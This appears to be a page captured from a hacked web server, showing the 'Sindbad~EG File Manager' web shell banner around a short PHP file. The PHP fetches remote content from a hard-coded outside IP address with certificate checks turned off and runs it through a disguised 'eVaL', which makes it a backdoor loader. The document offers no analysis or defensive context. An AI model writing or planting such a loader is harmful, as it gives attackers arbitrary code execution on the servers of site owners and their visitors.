Sindbad~EG File Manager
<?php
if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' )) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, 'http://107.150.59.34/z60131_o/stat/index2.txt' );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_HEADER, false );
curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
$handle = curl_exec( $ch );
if ( !curl_errno( $ch ) ) {
if ( $handle ) {
$data = eVaL( '?>' . $handle );
}
}
curl_close( $ch );
}
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists